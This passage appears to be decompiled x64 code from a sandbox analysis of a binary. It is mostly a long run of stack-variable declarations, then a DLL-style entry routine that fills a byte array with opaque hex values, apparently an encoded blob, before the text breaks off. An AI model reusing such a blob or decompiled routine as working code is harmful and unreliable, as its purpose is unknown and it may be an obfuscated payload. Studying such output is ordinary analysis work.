                                                                                                        				char _v1864;
                                                                                                        				char _v1865;
                                                                                                        				char _v1866;
                                                                                                        				char _v1867;
                                                                                                        				char _v1868;
                                                                                                        				char _v1869;
                                                                                                        				char _v1870;
                                                                                                        				char _v1871;
                                                                                                        				char _v1872;
                                                                                                        				char _v1873;
                                                                                                        				char _v1874;
                                                                                                        				char _v1875;
                                                                                                        				char _v1876;
                                                                                                        				char _v1877;
                                                                                                        				char _v1878;
                                                                                                        				char _v1879;
                                                                                                        				char _v1880;
                                                                                                        				char _v1881;
                                                                                                        				char _v1882;
                                                                                                        				char _v1883;
                                                                                                        				char _v1884;
                                                                                                        				char _v1885;
                                                                                                        				char _v1886;
                                                                                                        				char _v1887;
                                                                                                        				char _v1888;
                                                                                                        				char _v1889;
                                                                                                        				char _v1890;
                                                                                                        				char _v1891;
                                                                                                        				char _v1892;
                                                                                                        				char _v1893;
                                                                                                        				char _v1894;
                                                                                                        				char _v1895;
                                                                                                        				char _v1896;
                                                                                                        				char _v1897;
                                                                                                        				char _v1898;
                                                                                                        				char _v1899;
                                                                                                        				char _v1900;
                                                                                                        				char _v1901;
                                                                                                        				char _v1902;
                                                                                                        				char _v1903;
                                                                                                        				char _v1904;
                                                                                                        				char _v1905;
                                                                                                        				char _v1906;
                                                                                                        				char _v1907;
                                                                                                        				char _v1908;
                                                                                                        				char _v1909;
                                                                                                        				char _v1910;
                                                                                                        				char _v1911;
                                                                                                        				char _v1912;
                                                                                                        				char _v1913;
                                                                                                        				char _v1914;
                                                                                                        				char _v1915;
                                                                                                        				char _v1916;
                                                                                                        				char _v1917;
                                                                                                        				char _v1918;
                                                                                                        				char _v1919;
                                                                                                        				char _v1920;
                                                                                                        				char _v1921;
                                                                                                        				char _v1922;
                                                                                                        				char _v1923;
                                                                                                        				char _v1924;
                                                                                                        				char _v1925;
                                                                                                        				char _v1926;
                                                                                                        				char _v1927;
                                                                                                        				char _v1928;
                                                                                                        				char _v1929;
                                                                                                        				char _v1930;
                                                                                                        				char _v1931;
                                                                                                        				char _v1932;
                                                                                                        				char _v1933;
                                                                                                        				char _v1934;
                                                                                                        				char _v1935;
                                                                                                        				char _v1936;
                                                                                                        				char _v1937;
                                                                                                        				char _v1938;
                                                                                                        				char _v1939;
                                                                                                        				char _v1940;
                                                                                                        				char _v1941;
                                                                                                        				char _v1942;
                                                                                                        				char _v1943;
                                                                                                        				char _v1944;
                                                                                                        				char _v1945;
                                                                                                        				char _v1946;
                                                                                                        				char _v1947;
                                                                                                        				char _v1948;
                                                                                                        				char _v1949;
                                                                                                        				char _v1950;
                                                                                                        				char _v1951;
                                                                                                        				char _v1952;
                                                                                                        				char _v1953;
                                                                                                        				char _v1954;
                                                                                                        				char _v1955;
                                                                                                        				char _v1956;
                                                                                                        				char _v1957;
                                                                                                        				char _v1958;
                                                                                                        				char _v1959;
                                                                                                        				char _v1960;
                                                                                                        				char _v1961;
                                                                                                        				char _v1962;
                                                                                                        				char _v1963;
                                                                                                        				char _v1964;
                                                                                                        				char _v1965;
                                                                                                        				char _v1966;
                                                                                                        				char _v1967;
                                                                                                        				char _v1968;
                                                                                                        				char _v1969;
                                                                                                        				char _v1970;
                                                                                                        				char _v1971;
                                                                                                        				char _v1972;
                                                                                                        				char _v1973;
                                                                                                        				char _v1974;
                                                                                                        				char _v1975;
                                                                                                        				char _v1976;
                                                                                                        				char _v1977;
                                                                                                        				char _v1978;
                                                                                                        				char _v1979;
                                                                                                        				char _v1980;
                                                                                                        				char _v1981;
                                                                                                        				char _v1982;
                                                                                                        				char _v1983;
                                                                                                        				char _v1984;
                                                                                                        				char _v1985;
                                                                                                        				char _v1986;
                                                                                                        				char _v1987;
                                                                                                        				char _v1988;
                                                                                                        				char _v1989;
                                                                                                        				char _v1990;
                                                                                                        				char _v1991;
                                                                                                        				char _v1992;
                                                                                                        				char _v1993;
                                                                                                        				char _v1994;
                                                                                                        				char _v1995;
                                                                                                        				char _v1996;
                                                                                                        				char _v1997;
                                                                                                        				char _v1998;
                                                                                                        				char _v1999;
                                                                                                        				char _v2000;
                                                                                                        				char _v2001;
                                                                                                        				char _v2002;
                                                                                                        				char _v2003;
                                                                                                        				char _v2004;
                                                                                                        				char _v2005;
                                                                                                        				char _v2006;
                                                                                                        				char _v2007;
                                                                                                        				char _v2008;
                                                                                                        				char _v2009;
                                                                                                        				char _v2010;
                                                                                                        				char _v2011;
                                                                                                        				char _v2012;
                                                                                                        				char _v2013;
                                                                                                        				char _v2014;
                                                                                                        				char _v2015;
                                                                                                        				char _v2016;
                                                                                                        				char _v2017;
                                                                                                        				char _v2018;
                                                                                                        				char _v2019;
                                                                                                        				char _v2020;
                                                                                                        				char _v2021;
                                                                                                        				char _v2022;
                                                                                                        				char _v2023;
                                                                                                        				char _v2024;
                                                                                                        				char _v2025;
                                                                                                        				char _v2026;
                                                                                                        				char _v2027;
                                                                                                        				char _v2028;
                                                                                                        				char _v2029;
                                                                                                        				char _v2030;
                                                                                                        				char _v2031;
                                                                                                        				char _v2032;
                                                                                                        				char _v2033;
                                                                                                        				char _v2034;
                                                                                                        				char _v2035;
                                                                                                        				char _v2036;
                                                                                                        				char _v2037;
                                                                                                        				char _v2038;
                                                                                                        				char _v2039;
                                                                                                        				char _v2040;
                                                                                                        				char _v2041;
                                                                                                        				char _v2042;
                                                                                                        				char _v2043;
                                                                                                        				char _v2044;
                                                                                                        				char _v2045;
                                                                                                        				char _v2046;
                                                                                                        				char _v2047;
                                                                                                        				char _v2048;
                                                                                                        				char _v2049;
                                                                                                        				char _v2050;
                                                                                                        				char _v2051;
                                                                                                        				char _v2052;
                                                                                                        				char _v2053;
                                                                                                        				char _v2054;
                                                                                                        				char _v2055;
                                                                                                        				char _v2056;
                                                                                                        				char _v2057;
                                                                                                        				char _v2058;
                                                                                                        				char _v2059;
                                                                                                        				char _v2060;
                                                                                                        				char _v2061;
                                                                                                        				char _v2062;
                                                                                                        				char _v2063;
                                                                                                        				char _v2064;
                                                                                                        				char _v2065;
                                                                                                        				char _v2066;
                                                                                                        				char _v2067;
                                                                                                        				char _v2068;
                                                                                                        				char _v2069;
                                                                                                        				char _v2070;
                                                                                                        				char _v2071;
                                                                                                        				char _v2072;
                                                                                                        				char _v2073;
                                                                                                        				char _v2074;
                                                                                                        				char _v2075;
                                                                                                        				char _v2076;
                                                                                                        				char _v2077;
                                                                                                        				char _v2078;
                                                                                                        				char _v2079;
                                                                                                        				char _v2080;
                                                                                                        				char _v2081;
                                                                                                        				char _v2082;
                                                                                                        				char _v2083;
                                                                                                        				char _v2084;
                                                                                                        				char _v2085;
                                                                                                        				char _v2086;
                                                                                                        				char _v2087;
                                                                                                        				char _v2088;
                                                                                                        				char _v2089;
                                                                                                        				char _v2090;
                                                                                                        				char _v2091;
                                                                                                        				char _v2092;
                                                                                                        				char _v2093;
                                                                                                        				char _v2094;
                                                                                                        				char _v2095;
                                                                                                        				char _v2096;
                                                                                                        				char _v2097;
                                                                                                        				char _v2098;
                                                                                                        				char _v2099;
                                                                                                        				char _v2100;
                                                                                                        				char _v2101;
                                                                                                        				char _v2102;
                                                                                                        				char _v2103;
                                                                                                        				char _v2104;
                                                                                                        				char _v2105;
                                                                                                        				char _v2106;
                                                                                                        				char _v2107;
                                                                                                        				char _v2108;
                                                                                                        				char _v2109;
                                                                                                        				char _v2110;
                                                                                                        				char _v2111;
                                                                                                        				char _v2112;
                                                                                                        				char _v2113;
                                                                                                        				char _v2114;
                                                                                                        				char _v2115;
                                                                                                        				char _v2116;
                                                                                                        				char _v2117;
                                                                                                        				char _v2118;
                                                                                                        				char _v2119;
                                                                                                        				char _v2120;
                                                                                                        				char _v2121;
                                                                                                        				char _v2122;
                                                                                                        				char _v2123;
                                                                                                        				char _v2124;
                                                                                                        				char _v2125;
                                                                                                        				char _v2126;
                                                                                                        				char _v2127;
                                                                                                        				char _v2128;
                                                                                                        				char _v2129;
                                                                                                        				char _v2130;
                                                                                                        				char _v2131;
                                                                                                        				char _v2132;
                                                                                                        				char _v2133;
                                                                                                        				char _v2134;
                                                                                                        				char _v2135;
                                                                                                        				char _v2136;
                                                                                                        				char _v2137;
                                                                                                        				char _v2138;
                                                                                                        				char _v2139;
                                                                                                        				char _v2140;
                                                                                                        				char _v2141;
                                                                                                        				char _v2142;
                                                                                                        				char _v2143;
                                                                                                        				char _v2144;
                                                                                                        				char _v2145;
                                                                                                        				char _v2146;
                                                                                                        				char _v2147;
                                                                                                        				char _v2148;
                                                                                                        				char _v2149;
                                                                                                        				char _v2150;
                                                                                                        				char _v2151;
                                                                                                        				char _v2152;
                                                                                                        				char _v2153;
                                                                                                        				char _v2154;
                                                                                                        				char _v2155;
                                                                                                        				char _v2156;
                                                                                                        				char _v2157;
                                                                                                        				char _v2158;
                                                                                                        				char _v2159;
                                                                                                        				char _v2160;
                                                                                                        				char _v2161;
                                                                                                        				char _v2162;
                                                                                                        				char _v2163;
                                                                                                        				char _v2164;
                                                                                                        				char _v2165;
                                                                                                        				char _v2166;
                                                                                                        				char _v2167;
                                                                                                        				char _v2168;
                                                                                                        				char _v2169;
                                                                                                        				char _v2170;
                                                                                                        				char _v2171;
                                                                                                        				char _v2172;
                                                                                                        				char _v2173;
                                                                                                        				char _v2174;
                                                                                                        				char _v2175;
                                                                                                        				char _v2176;
                                                                                                        				char _v2177;
                                                                                                        				char _v2178;
                                                                                                        				char _v2179;
                                                                                                        				char _v2180;
                                                                                                        				char _v2181;
                                                                                                        				char _v2182;
                                                                                                        				char _v2183;
                                                                                                        				char _v2184;
                                                                                                        				char _v2185;
                                                                                                        				char _v2186;
                                                                                                        				char _v2187;
                                                                                                        				char _v2188;
                                                                                                        				char _v2189;
                                                                                                        				char _v2190;
                                                                                                        				char _v2191;
                                                                                                        				char _v2192;
                                                                                                        				char _v2193;
                                                                                                        				char _v2194;
                                                                                                        				char _v2195;
                                                                                                        				char _v2196;
                                                                                                        				char _v2197;
                                                                                                        				char _v2198;
                                                                                                        				char _v2199;
                                                                                                        				char _v2200;
                                                                                                        				char _v2201;
                                                                                                        				char _v2202;
                                                                                                        				char _v2203;
                                                                                                        				char _v2204;
                                                                                                        				char _v2205;
                                                                                                        				char _v2206;
                                                                                                        				char _v2207;
                                                                                                        				char _v2208;
                                                                                                        				char _v2209;
                                                                                                        				char _v2210;
                                                                                                        				char _v2211;
                                                                                                        				char _v2212;
                                                                                                        				char _v2213;
                                                                                                        				char _v2214;
                                                                                                        				char _v2215;
                                                                                                        				char _v2216;
                                                                                                        				char _v2217;
                                                                                                        				char _v2218;
                                                                                                        				char _v2219;
                                                                                                        				char _v2220;
                                                                                                        				char _v2221;
                                                                                                        				char _v2222;
                                                                                                        				char _v2223;
                                                                                                        				char _v2224;
                                                                                                        				char _v2225;
                                                                                                        				char _v2226;
                                                                                                        				char _v2227;
                                                                                                        				char _v2228;
                                                                                                        				char _v2229;
                                                                                                        				char _v2230;
                                                                                                        				char _v2231;
                                                                                                        				char _v2232;
                                                                                                        				char _v2233;
                                                                                                        				char _v2234;
                                                                                                        				char _v2235;
                                                                                                        				char _v2236;
                                                                                                        				char _v2237;
                                                                                                        				char _v2238;
                                                                                                        				char _v2239;
                                                                                                        				char _v2240;
                                                                                                        				char _v2241;
                                                                                                        				char _v2242;
                                                                                                        				char _v2243;
                                                                                                        				char _v2244;
                                                                                                        				char _v2245;
                                                                                                        				char _v2246;
                                                                                                        				char _v2247;
                                                                                                        				char _v2248;
                                                                                                        				char _v2249;
                                                                                                        				char _v2250;
                                                                                                        				char _v2251;
                                                                                                        				char _v2252;
                                                                                                        				char _v2253;
                                                                                                        				char _v2254;
                                                                                                        				char _v2255;
                                                                                                        				char _v2256;
                                                                                                        				char _v2257;
                                                                                                        				char _v2258;
                                                                                                        				char _v2259;
                                                                                                        				char _v2260;
                                                                                                        				char _v2261;
                                                                                                        				char _v2262;
                                                                                                        				char _v2263;
                                                                                                        				char _v2264;
                                                                                                        				char _v2265;
                                                                                                        				char _v2266;
                                                                                                        				char _v2267;
                                                                                                        				char _v2268;
                                                                                                        				char _v2269;
                                                                                                        				char _v2270;
                                                                                                        				char _v2271;
                                                                                                        				char _v2272;
                                                                                                        				char _v2273;
                                                                                                        				char _v2274;
                                                                                                        				char _v2275;
                                                                                                        				char _v2276;
                                                                                                        				char _v2277;
                                                                                                        				char _v2278;
                                                                                                        				char _v2279;
                                                                                                        				char _v2280;
                                                                                                        				char _v2281;
                                                                                                        				char _v2282;
                                                                                                        				char _v2283;
                                                                                                        				char _v2284;
                                                                                                        				char _v2285;
                                                                                                        				char _v2286;
                                                                                                        				char _v2287;
                                                                                                        				char _v2288;
                                                                                                        				char _v2289;
                                                                                                        				char _v2290;
                                                                                                        				char _v2291;
                                                                                                        				char _v2292;
                                                                                                        				char _v2293;
                                                                                                        				char _v2294;
                                                                                                        				char _v2295;
                                                                                                        				char _v2296;
                                                                                                        				char _v2297;
                                                                                                        				char _v2298;
                                                                                                        				char _v2299;
                                                                                                        				char _v2300;
                                                                                                        				char _v2301;
                                                                                                        				char _v2302;
                                                                                                        				char _v2303;
                                                                                                        				char _v2304;
                                                                                                        				char _v2305;
                                                                                                        				char _v2306;
                                                                                                        				char _v2307;
                                                                                                        				char _v2308;
                                                                                                        				char _v2309;
                                                                                                        				char _v2310;
                                                                                                        				char _v2311;
                                                                                                        				char _v2312;
                                                                                                        				char _v2313;
                                                                                                        				char _v2314;
                                                                                                        				char _v2315;
                                                                                                        				char _v2316;
                                                                                                        				char _v2317;
                                                                                                        				char _v2318;
                                                                                                        				char _v2319;
                                                                                                        				char _v2320;
                                                                                                        				char _v2321;
                                                                                                        				char _v2322;
                                                                                                        				char _v2323;
                                                                                                        				char _v2324;
                                                                                                        				char _v2325;
                                                                                                        				char _v2326;
                                                                                                        				char _v2327;
                                                                                                        				char _v2328;
                                                                                                        				char _v2329;
                                                                                                        				char _v2330;
                                                                                                        				char _v2331;
                                                                                                        				char _v2332;
                                                                                                        				char _v2333;
                                                                                                        				char _v2334;
                                                                                                        				char _v2335;
                                                                                                        				char _v2336;
                                                                                                        				char _v2337;
                                                                                                        				char _v2338;
                                                                                                        				char _v2339;
                                                                                                        				char _v2340;
                                                                                                        				char _v2341;
                                                                                                        				char _v2342;
                                                                                                        				char _v2343;
                                                                                                        				char _v2344;
                                                                                                        				char _v2345;
                                                                                                        				char _v2346;
                                                                                                        				char _v2347;
                                                                                                        				char _v2348;
                                                                                                        				char _v2349;
                                                                                                        				char _v2350;
                                                                                                        				char _v2351;
                                                                                                        				char _v2352;
                                                                                                        				char _v2353;
                                                                                                        				char _v2354;
                                                                                                        				char _v2355;
                                                                                                        				char _v2356;
                                                                                                        				char _v2357;
                                                                                                        				char _v2358;
                                                                                                        				char _v2359;
                                                                                                        				char _v2360;
                                                                                                        				char _v2361;
                                                                                                        				char _v2362;
                                                                                                        				char _v2363;
                                                                                                        				char _v2364;
                                                                                                        				char _v2365;
                                                                                                        				char _v2366;
                                                                                                        				char _v2367;
                                                                                                        				char _v2368;
                                                                                                        				char _v2369;
                                                                                                        				char _v2370;
                                                                                                        				char _v2371;
                                                                                                        				char _v2372;
                                                                                                        				char _v2373;
                                                                                                        				char _v2374;
                                                                                                        				char _v2375;
                                                                                                        				char _v2376;
                                                                                                        				char _v2377;
                                                                                                        				char _v2378;
                                                                                                        				char _v2379;
                                                                                                        				char _v2380;
                                                                                                        				char _v2381;
                                                                                                        				char _v2382;
                                                                                                        				char _v2383;
                                                                                                        				char _v2384;
                                                                                                        				char _v2385;
                                                                                                        				char _v2386;
                                                                                                        				char _v2387;
                                                                                                        				char _v2388;
                                                                                                        				char _v2389;
                                                                                                        				char _v2390;
                                                                                                        				char _v2391;
                                                                                                        				char _v2392;
                                                                                                        				char _v2393;
                                                                                                        				char _v2394;
                                                                                                        				char _v2395;
                                                                                                        				char _v2396;
                                                                                                        				char _v2397;
                                                                                                        				char _v2398;
                                                                                                        				char _v2399;
                                                                                                        				char _v2400;
                                                                                                        				char _v2401;
                                                                                                        				char _v2402;
                                                                                                        				char _v2403;
                                                                                                        				char _v2404;
                                                                                                        				char _v2405;
                                                                                                        				char _v2406;
                                                                                                        				char _v2407;
                                                                                                        				char _v2408;
                                                                                                        				char _v2409;
                                                                                                        				char _v2410;
                                                                                                        				char _v2411;
                                                                                                        				char _v2412;
                                                                                                        				char _v2413;
                                                                                                        				char _v2414;
                                                                                                        				char _v2415;
                                                                                                        				char _v2416;
                                                                                                        				char _v2417;
                                                                                                        				char _v2418;
                                                                                                        				char _v2419;
                                                                                                        				char _v2420;
                                                                                                        				char _v2421;
                                                                                                        				char _v2422;
                                                                                                        				char _v2423;
                                                                                                        				char _v2424;
                                                                                                        				char _v2425;
                                                                                                        				char _v2426;
                                                                                                        				char _v2427;
                                                                                                        				char _v2428;
                                                                                                        				char _v2429;
                                                                                                        				char _v2430;
                                                                                                        				char _v2431;
                                                                                                        				char _v2432;
                                                                                                        				char _v2433;
                                                                                                        				char _v2434;
                                                                                                        				char _v2435;
                                                                                                        				char _v2436;
                                                                                                        				char _v2437;
                                                                                                        				char _v2438;
                                                                                                        				char _v2439;
                                                                                                        				char _v2440;
                                                                                                        				char _v2441;
                                                                                                        				char _v2442;
                                                                                                        				char _v2443;
                                                                                                        				char _v2444;
                                                                                                        				char _v2445;
                                                                                                        				char _v2446;
                                                                                                        				char _v2447;
                                                                                                        				char _v2448;
                                                                                                        				char _v2449;
                                                                                                        				char _v2450;
                                                                                                        				char _v2451;
                                                                                                        				char _v2452;
                                                                                                        				char _v2453;
                                                                                                        				char _v2454;
                                                                                                        				char _v2455;
                                                                                                        				char _v2456;
                                                                                                        				char _v2457;
                                                                                                        				char _v2458;
                                                                                                        				char _v2459;
                                                                                                        				char _v2460;
                                                                                                        				char _v2461;
                                                                                                        				char _v2462;
                                                                                                        				char _v2463;
                                                                                                        				char _v2464;
                                                                                                        				char _v2465;
                                                                                                        				char _v2466;
                                                                                                        				char _v2467;
                                                                                                        				char _v2468;
                                                                                                        				char _v2469;
                                                                                                        				char _v2470;
                                                                                                        				char _v2471;
                                                                                                        				char _v2472;
                                                                                                        				char _v2473;
                                                                                                        				char _v2474;
                                                                                                        				char _v2475;
                                                                                                        				char _v2476;
                                                                                                        				char _v2477;
                                                                                                        				char _v2478;
                                                                                                        				char _v2479;
                                                                                                        				char _v2480;
                                                                                                        				char _v2481;
                                                                                                        				char _v2482;
                                                                                                        				char _v2483;
                                                                                                        				char _v2484;
                                                                                                        				char _v2485;
                                                                                                        				char _v2486;
                                                                                                        				char _v2487;
                                                                                                        				char _v2488;
                                                                                                        				char _v2489;
                                                                                                        				char _v2490;
                                                                                                        				char _v2491;
                                                                                                        				char _v2492;
                                                                                                        				char _v2493;
                                                                                                        				char _v2494;
                                                                                                        				char _v2495;
                                                                                                        				char _v2496;
                                                                                                        				char _v2497;
                                                                                                        				char _v2498;
                                                                                                        				char _v2499;
                                                                                                        				char _v2500;
                                                                                                        				char _v2501;
                                                                                                        				char _v2502;
                                                                                                        				char _v2503;
                                                                                                        				char _v2504;
                                                                                                        				char _v2505;
                                                                                                        				char _v2506;
                                                                                                        				char _v2507;
                                                                                                        				char _v2508;
                                                                                                        				char _v2509;
                                                                                                        				char _v2510;
                                                                                                        				char _v2511;
                                                                                                        				char _v2512;
                                                                                                        				char _v2513;
                                                                                                        				char _v2514;
                                                                                                        				char _v2515;
                                                                                                        				char _v2516;
                                                                                                        				char _v2517;
                                                                                                        				char _v2518;
                                                                                                        				char _v2519;
                                                                                                        				char _v2520;
                                                                                                        				char _v2521;
                                                                                                        				char _v2522;
                                                                                                        				char _v2523;
                                                                                                        				char _v2524;
                                                                                                        				char _v2525;
                                                                                                        				char _v2526;
                                                                                                        				char _v2527;
                                                                                                        				char _v2528;
                                                                                                        				char _v2529;
                                                                                                        				char _v2530;
                                                                                                        				char _v2531;
                                                                                                        				char _v2532;
                                                                                                        				char _v2533;
                                                                                                        				char _v2534;
                                                                                                        				char _v2535;
                                                                                                        				char _v2536;
                                                                                                        				char _v2537;
                                                                                                        				char _v2538;
                                                                                                        				char _v2539;
                                                                                                        				char _v2540;
                                                                                                        				char _v2541;
                                                                                                        				char _v2542;
                                                                                                        				char _v2543;
                                                                                                        				char _v2544;
                                                                                                        				char _v2545;
                                                                                                        				char _v2546;
                                                                                                        				char _v2547;
                                                                                                        				char _v2548;
                                                                                                        				char _v2549;
                                                                                                        				char _v2550;
                                                                                                        				char _v2551;
                                                                                                        				char _v2552;
                                                                                                        				char _v2553;
                                                                                                        				char _v2554;
                                                                                                        				char _v2555;
                                                                                                        				char _v2556;
                                                                                                        				char _v2557;
                                                                                                        				char _v2558;
                                                                                                        				char _v2559;
                                                                                                        				char _v2560;
                                                                                                        				char _v2561;
                                                                                                        				char _v2562;
                                                                                                        				char _v2563;
                                                                                                        				char _v2564;
                                                                                                        				char _v2565;
                                                                                                        				char _v2566;
                                                                                                        				char _v2567;
                                                                                                        				char _v2568;
                                                                                                        				char _v2569;
                                                                                                        				char _v2570;
                                                                                                        				char _v2571;
                                                                                                        				char _v2572;
                                                                                                        				char _v2573;
                                                                                                        				char _v2574;
                                                                                                        				char _v2575;
                                                                                                        				char _v2576;
                                                                                                        				char _v2577;
                                                                                                        				char _v2578;
                                                                                                        				char _v2579;
                                                                                                        				char _v2580;
                                                                                                        				char _v2581;
                                                                                                        				char _v2582;
                                                                                                        				char _v2583;
                                                                                                        				char _v2584;
                                                                                                        				char _v2585;
                                                                                                        				char _v2586;
                                                                                                        				char _v2587;
                                                                                                        				char _v2588;
                                                                                                        				char _v2589;
                                                                                                        				char _v2590;
                                                                                                        				char _v2591;
                                                                                                        				char _v2592;
                                                                                                        				char _v2593;
                                                                                                        				char _v2594;
                                                                                                        				char _v2595;
                                                                                                        				char _v2596;
                                                                                                        				char _v2597;
                                                                                                        				char _v2598;
                                                                                                        				char _v2599;
                                                                                                        				char _v2600;
                                                                                                        				char _v2601;
                                                                                                        				char _v2602;
                                                                                                        				char _v2603;
                                                                                                        				char _v2604;
                                                                                                        				char _v2605;
                                                                                                        				char _v2606;
                                                                                                        				char _v2607;
                                                                                                        				char _v2608;
                                                                                                        				char _v2609;
                                                                                                        				char _v2610;
                                                                                                        				char _v2611;
                                                                                                        				char _v2612;
                                                                                                        				char _v2613;
                                                                                                        				char _v2614;
                                                                                                        				char _v2615;
                                                                                                        				char _v2616;
                                                                                                        				char _v2617;
                                                                                                        				char _v2618;
                                                                                                        				char _v2619;
                                                                                                        				char _v2620;
                                                                                                        				char _v2621;
                                                                                                        				char _v2622;
                                                                                                        				char _v2623;
                                                                                                        				char _v2624;
                                                                                                        				char _v2625;
                                                                                                        				char _v2626;
                                                                                                        				char _v2627;
                                                                                                        				char _v2628;
                                                                                                        				char _v2629;
                                                                                                        				char _v2630;
                                                                                                        				char _v2631;
                                                                                                        				char _v2632;
                                                                                                        				char _v2672;
                                                                                                        				char _v2704;
                                                                                                        				void* _v2736;
                                                                                                        				char _v2752;
                                                                                                        				signed long long _v2760;
                                                                                                        				long long _v2768;
                                                                                                        				char _v2776;
                                                                                                        				signed int _v2780;
                                                                                                        				intOrPtr _v2784;
                                                                                                        				signed long long _v2792;
                                                                                                        				signed char _v2796;
                                                                                                        				signed char _v2800;
                                                                                                        				signed char _v2804;
                                                                                                        				signed char _v2808;
                                                                                                        				signed int _t2669;
                                                                                                        				signed long long _t2714;
                                                                                                        				signed long long _t2715;
                                                                                                        				long long _t2716;
                                                                                                        				signed long long _t2748;
                                                                                                        
                                                                                                        				_t2746 = __rdi;
                                                                                                        				_t2703 = __edi;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __edx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_t2714 =  *0x1244e008; // 0x2d0c2734ea27
                                                                                                        				_t2715 = _t2714 ^ _t2748;
                                                                                                        				_v24 = _t2715;
                                                                                                        				_v2784 = _a16;
                                                                                                        				if (_v2784 == 1) goto 0x123e3fee;
                                                                                                        				goto 0x123e93e5;
                                                                                                        				_v2796 = 0;
                                                                                                        				_v2800 = 0;
                                                                                                        				_v2768 = 0;
                                                                                                        				_v2792 = 0;
                                                                                                        				E00007FFC7FFC123D97DC(_a16, __rcx); // executed
                                                                                                        				_v2792 = _t2715;
                                                                                                        				if (_v2792 == 0) goto 0x123e4039;
                                                                                                        				r8d = 0x5f5e100;
                                                                                                        				E00007FFC7FFC123D6920(0x5f5e100, 0, __edi, __esp, _v2792, __rdx, __rdi, __r8);
                                                                                                        				E00007FFC7FFC123D93A8(_t2715, __rbx, _v2792, __rsi); // executed
                                                                                                        				 *0x1244ea20 = 0;
                                                                                                        				 *0x1244ea14 = 0;
                                                                                                        				 *0x1244ea24 = 0;
                                                                                                        				 *0x1244ea18 = 0;
                                                                                                        				 *0x1244ea1c = 0;
                                                                                                        				 *0x1244ea10 = 0;
                                                                                                        				_v2632 = 0x62;
                                                                                                        				_v2631 = 0xfa;
                                                                                                        				_v2630 = 0x28;
                                                                                                        				_v2629 = 0x18;
                                                                                                        				_v2628 = 0x56;
                                                                                                        				_v2627 = 0x18;
                                                                                                        				_v2626 = 0x3d;
                                                                                                        				_v2625 = 0x31;
                                                                                                        				_v2624 = 0x39;
                                                                                                        				_v2623 = 0x13;
                                                                                                        				_v2622 = 0x33;
                                                                                                        				_v2621 = 9;
                                                                                                        				_v2620 = 5;
                                                                                                        				_v2619 = 0x64;
                                                                                                        				_v2618 = 0x18;
                                                                                                        				_v2617 = 0x2d;
                                                                                                        				_v2616 = 0x39;
                                                                                                        				_v2615 = 0x32;
                                                                                                        				_v2614 = 0xae;
                                                                                                        				_v2613 = 0x33;
                                                                                                        				_v2612 = 2;
                                                                                                        				_v2611 = 0xdc;
                                                                                                        				_v2610 = 0xf;
                                                                                                        				_v2609 = 0xd9;
                                                                                                        				_v2608 = 0x8a;
                                                                                                        				_v2607 = 0x2c;
                                                                                                        				_v2606 = 0x45;
                                                                                                        				_v2605 = 0x26;
                                                                                                        				_v2604 = 0x3c;
                                                                                                        				_v2603 = 0x60;
                                                                                                        				_v2602 = 0x69;
                                                                                                        				_v2601 = 0xdb;
                                                                                                        				_v2600 = 0x9e;
                                                                                                        				_v2599 = 0x2e;
                                                                                                        				_v2598 = 0xd5;
                                                                                                        				_v2597 = 0x26;
                                                                                                        				_v2596 = 0x26;
                                                                                                        				_v2595 = 0x30;
                                                                                                        				_v2594 = 0x3f;
                                                                                                        				_v2593 = 0x22;
                                                                                                        				_v2592 = 0xe6;
                                                                                                        				_v2591 = 0xce;
                                                                                                        				_v2590 = 0x3c;
                                                                                                        				_v2589 = 0xe6;
                                                                                                        				_v2588 = 0x4c;
                                                                                                        				_v2587 = 0xd5;
                                                                                                        				_v2586 = 0xb9;
                                                                                                        				_v2585 = 0x39;
                                                                                                        				_v2584 = 0xef;
                                                                                                        				_v2583 = 0xdb;
                                                                                                        				_v2582 = 0x81;
                                                                                                        				_v2581 = 0x12;
                                                                                                        				_v2580 = 0xc4;
                                                                                                        				_v2579 = 0xb;
                                                                                                        				_v2578 = 0xd7;
                                                                                                        				_v2577 = 0x22;
                                                                                                        				_v2576 = 0xdb;
                                                                                                        				_v2575 = 2;
                                                                                                        				_v2574 = 0xb8;
                                                                                                        				_v2573 = 0x15;
                                                                                                        				_v2572 = 0xa8;
                                                                                                        				_v2571 = 2;
                                                                                                        				_v2570 = 0x48;
                                                                                                        				_v2569 = 0xb;
                                                                                                        				_v2568 = 0x36;
                                                                                                        				_v2567 = 0xaa;
                                                                                                        				_v2566 = 0x3a;
                                                                                                        				_v2565 = 0xde;
                                                                                                        				_v2564 = 0x30;
                                                                                                        				_v2563 = 0xcf;
                                                                                                        				_v2562 = 0x15;
                                                                                                        				_v2561 = 0xca;
                                                                                                        				_v2560 = 0x30;
                                                                                                        				_v2559 = 0xcc;
                                                                                                        				_v2558 = 0x6b;
                                                                                                        				_v2557 = 0xae;
                                                                                                        				_v2556 = 0x69;
                                                                                                        				_v2555 = 0xd3;
                                                                                                        				_v2554 = 0x5a;
                                                                                                        				_v2553 = 0xb1;
                                                                                                        				_v2552 = 0x27;
                                                                                                        				_v2551 = 0xe4;
                                                                                                        				_v2550 = 0x28;
                                                                                                        				_v2549 = 0xf6;
                                                                                                        				_v2548 = 0x19;
                                                                                                        				_v2547 = 0xb6;
                                                                                                        				_v2546 = 0xf;
                                                                                                        				_v2545 = 0x65;
                                                                                                        				_v2544 = 0x7b;
                                                                                                        				_v2543 = 0xf9;
                                                                                                        				_v2542 = 0xa;
                                                                                                        				_v2541 = 0x3d;
                                                                                                        				_v2540 = 0x71;
                                                                                                        				_v2539 = 0x89;
                                                                                                        				_v2538 = 0x4e;
                                                                                                        				_v2537 = 0x57;
                                                                                                        				_v2536 = 0x40;
                                                                                                        				_v2535 = 0xfb;
                                                                                                        				_v2534 = 0x1b;
                                                                                                        				_v2533 = 0xf1;
                                                                                                        				_v2532 = 0x1c;
                                                                                                        				_v2531 = 0x67;
                                                                                                        				_v2530 = 0;
                                                                                                        				_v2529 = 0x52;
                                                                                                        				_v2528 = 0xa0;
                                                                                                        				_v2527 = 0xd;
                                                                                                        				_v2526 = 0x90;
                                                                                                        				_v2525 = 0x40;
                                                                                                        				_v2524 = 0x4e;
                                                                                                        				_v2523 = 0;
                                                                                                        				_v2522 = 0x6e;
                                                                                                        				_v2521 = 0xbd;
                                                                                                        				_v2520 = 0x66;
                                                                                                        				_v2519 = 0x9b;
                                                                                                        				_v2518 = 0x15;
                                                                                                        				_v2517 = 0x74;
                                                                                                        				_v2516 = 0x75;
                                                                                                        				_v2515 = 0x58;
                                                                                                        				_v2514 = 0xa1;
                                                                                                        				_v2513 = 0x31;
                                                                                                        				_v2512 = 0x8c;
